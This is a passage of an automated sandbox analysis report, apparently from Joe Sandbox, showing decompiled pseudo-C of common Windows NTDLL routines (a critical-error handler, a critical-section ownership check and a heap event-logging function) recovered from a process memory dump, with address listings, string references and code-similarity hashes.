				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E04C55720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L04C1DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L04C1DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E04C1D130(_t34, _t39, _t40);
			}





              0x04c78df1
              0x04c78df1
              0x04c78df1
              0x04c78df1
              0x04c78df1
              0x04c78df1
              0x04c78df3
              0x04c78df8
              0x04c78dfd
              0x04c78e00
              0x04c78e0e
              0x04c78e2a
              0x04c78e36
              0x04c78e38
              0x04c78e3c
              0x04c78e46
              0x04c78e46
              0x04c78e36
              0x04c78e50
              0x04c78e56
              0x04c78e59
              0x04c78e5c
              0x04c78e60
              0x04c78e67
              0x04c78e6d
              0x04c78e73
              0x04c78e74
              0x04c78eb1
              0x04c78ebd

              Strings
              • Critical error detected %lx, xrefs: 04C78E21
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID: Critical error detected %lx
              • API String ID: 0-802127002
              • Opcode ID: f58cb97d27a43cf7d82473058f40218fabf442728992a63af30d8ac487bf5be1
              • Instruction ID: b01c765685dba2d5721a2dd2b7a0ea6fca759b33a2e509d728cb9c5c8bdd95f9
              • Opcode Fuzzy Hash: f58cb97d27a43cf7d82473058f40218fabf442728992a63af30d8ac487bf5be1
              • Instruction Fuzzy Hash: F911ADB5D10348EBEF24DFA485097DCBBB2BB05314F24425DE5296B2A1C3742602EF24
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04C5FF10 Relevance: 1.3, Strings: 1, Instructions: 44COMMON
              Download Yara Rule
              Strings
              • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 04C5FF60
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
              • API String ID: 0-1911121157
              • Opcode ID: 9d6de91f0c5c7449f68c53275fd74b5deafdfea731995496259a5c4613914048
              • Instruction ID: c99b5da9ca5175ec49917ede9a314add950f62713b7ca0cd3711e8177b4ce705
              • Opcode Fuzzy Hash: 9d6de91f0c5c7449f68c53275fd74b5deafdfea731995496259a5c4613914048
              • Instruction Fuzzy Hash: 6511E175510144EFEB16DF50C848F9C77B3FB05718F148198E909576B0C738BA80EB54
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04C95BA5 Relevance: .6, Instructions: 592COMMON
              Download Yara Rule
              C-Code - Quality: 88%
              			E04C95BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x4ca1178);
				E04C1D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E04C94C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E04C0D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E04C95542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x4cb60e8;
								if( *0x4cb60e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x4cb60e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E04C09710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E04C06DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E04C0F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E04C0F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E04C0F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E04C0FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E04C0FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E04C0F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E04C0F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E04C94CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E04C1D130(_t427, _t494, _t511);
				}
			}










































































              0x04c95ba5
              0x04c95baa
              0x04c95baf
              0x04c95bb4
              0x04c95bb6
              0x04c95bbc
              0x04c95bbe
              0x04c95bc4
              0x04c95bcd
              0x04c95bd3
              0x04c95bd6
              0x04c95bdc
              0x04c95be0
              0x04c95be3
              0x04c95beb
              0x04c95bf2
              0x04c95bf8
              0x04c95bfe
              0x04c95c04
              0x04c95c0e
              0x04c95c18
              0x04c95c1f
              0x04c95c25
              0x04c95c2a
              0x04c95c2c
              0x04c95c32
              0x04c95c3a
              0x04c95c3f
              0x04c95c42
              0x04c95c48
              0x04c95c5b
              0x04c95c5b
              0x04c95c2c
              0x04c95cb7
              0x04c95cb9
              0x04c95cbf
              0x04c95cc2
              0x04c95cca
              0x04c95ccb
              0x04c95ccb
              0x04c95cd1
              0x04c95cd7
              0x04c95cda
              0x04c95ce1
              0x04c95ce4
              0x04c95ce7
              0x04c95ced
              0x04c95cf3
              0x04c95cf9
              0x04c95cff
              0x04c95d08
              0x04c95d0a
              0x04c95d0e
              0x04c95d10
              0x00000000
              0x00000000
              0x04c95d16
              0x04c95d1a
              0x00000000
              0x00000000
              0x04c95d20
              0x04c95d22
              0x04c95d25
              0x04c95d2f
              0x04c95d2f
              0x04c95d33
              0x04c95d3d
              0x04c95d49
              0x04c95d4b
              0x00000000
              0x00000000
              0x04c95d5a
              0x04c95d5d
              0x04c95d60
              0x00000000
              0x00000000
              0x04c95d66
              0x04c95d69
              0x00000000
              0x00000000
              0x04c95d6f
              0x04c95d6f
              0x04c95d73
              0x04c95d79
              0x04c95d7f
              0x04c95d86
              0x04c95d95
              0x04c95d98
              0x04c95dba
              0x04c95dcb
              0x04c95dce
              0x04c95dd3
              0x04c95dd6
              0x04c95dd8
              0x04c95de6
              0x04c95dec
              0x04c95dee
              0x04c95df1
              0x04c95df3
              0x04c9635a
              0x04c9635a
              0x00000000
              0x04c9635a
              0x04c95dfe
              0x04c95e02
              0x04c95e05
              0x04c95e07
              0x04c95e10
              0x04c95e13
              0x04c95e1b
              0x04c95e1c
              0x04c95e21
              0x04c95e22
              0x04c95e23
              0x04c95e25
              0x04c95e2a
              0x04c95e2c
              0x04c95e2e
              0x04c95e36
              0x04c95e39
              0x04c95e42
              0x04c95e47
              0x04c95e4d
              0x04c95e54
              0x04c95e54
              0x04c95e54
              0x04c95e2e
              0x04c95e5c
              0x04c95e5f
              0x04c95e62
              0x04c95e64
              0x04c95e6b
              0x04c95e70
              0x04c95e7a
              0x04c95e7a
              0x04c95e7a
              0x04c95e6b
              0x04c95e7e
              0x04c95e7f
              0x04c95e7f
              0x04c95e81
              0x04c95e87
              0x04c95e8b
              0x04c95e8c
              0x04c95e8c
              0x04c95e8c
              0x04c95e9a
              0x04c95e9c
              0x04c95ea2
              0x04c95ea6
              0x04c95f50
              0x04c95f50
              0x04c95f57
              0x04c95f66
              0x04c95f66
              0x04c95f66
              0x04c95f68
              0x04c95f6a
              0x04c963d0
              0x00000000
              0x04c95f70
              0x04c95f70
              0x04c95f91
              0x04c95f9c
              0x04c95f9e
              0x04c95fa4
              0x04c95fa6
              0x04c9638c
              0x04c96392
              0x04c963a1
              0x04c963a7
              0x04c963af
              0x04c963af
              0x04c963bd
              0x04c963d8
              0x00000000
              0x04c963d8
              0x04c95fac
              0x04c95fb2
              0x04c95fb4
              0x04c95fbd
              0x04c95fc6
              0x04c95fce
              0x04c95fd4
              0x04c95fdc
              0x04c95fec
              0x04c95fed
              0x04c95fee
              0x04c95fef
              0x04c95ff9
              0x04c95ffa
              0x04c95ffb
              0x04c95ffc
              0x04c96000
              0x04c96004
              0x04c96012
              0x04c96012
              0x04c96018
              0x04c96019
              0x04c9601a
              0x04c9601b
              0x04c9601c
              0x04c96020
              0x04c96059
              0x04c9605c
              0x04c96061
              0x04c96061
              0x04c96022
              0x04c96022
              0x04c96022
              0x04c96025
              0x04c9602a
              0x04c9602b
              0x04c96031
              0x04c96037
              0x04c96038
              0x04c9603e
              0x04c96048
              0x04c96049
              0x04c9604a
              0x04c9604b
              0x04c9604c
              0x04c9604d
              0x04c96053
              0x04c96054
              0x04c96054
              0x04c96062
              0x04c96065
              0x04c96067
              0x04c9606a
              0x04c96070
              0x04c96075
              0x04c96076
              0x04c96081
              0x04c96087
              0x04c96095
              0x04c96099
              0x04c9609e
              0x04c960a4
              0x04c960ae
              0x04c960b0
              0x04c960b3
              0x04c960b6
              0x04c960b8
              0x04c960ba
              0x04c960ba
              0x04c960ba
              0x04c960ba
              0x04c960be
              0x04c960c0
              0x04c960c5
              0x04c960c5
              0x04c960c5
              0x04c960c6
              0x04c960cd
              0x04c96114
              0x04c960cf
              0x04c960cf
              0x04c960d4
              0x04c960d5
              0x04c960da
              0x04c960db
              0x04c960e1
              0x04c960e2
              0x04c960e8
              0x04c960f8
              0x04c960fd
              0x04c960fe
              0x04c96102
              0x04c96104
              0x04c96107
              0x04c96109
              0x04c9610b
              0x04c9610b
              0x04c9610b
              0x04c9610b
              0x04c9610f
              0x04c9610f
              0x04c96117
              0x04c9611a
              0x04c9611f
              0x04c96125
              0x04c96134
              0x04c96139
              0x04c9613f
              0x04c96146
              0x04c96148
              0x04c9614b
              0x04c9614d
              0x04c9614f
              0x04c9614f
              0x04c9614f
              0x04c9614f
              0x04c96153
              0x04c96159
              0x04c96159
              0x04c9615c
              0x04c96163
              0x04c96169
              0x04c9616c
              0x04c96172
              0x04c96181
              0x04c96186
              0x04c96187
              0x04c9618b
              0x04c96191
              0x04c96195
              0x04c961a3
              0x04c961bb
              0x04c961c0
              0x04c961c3
              0x04c961cc
              0x04c961d0
              0x04c961dc
              0x04c961de
              0x04c961e1
              0x04c961e4
              0x04c961e6
              0x04c961e8
              0x04c961e8
              0x04c961e8
              0x04c961e8
              0x04c961e6
              0x04c961ec
              0x04c961f3
              0x04c96203
              0x04c96209
              0x04c9620a
              0x04c96216
              0x04c9621d
              0x04c96227
              0x04c96241
              0x04c96246
              0x04c9624c
              0x04c96257
              0x04c96259
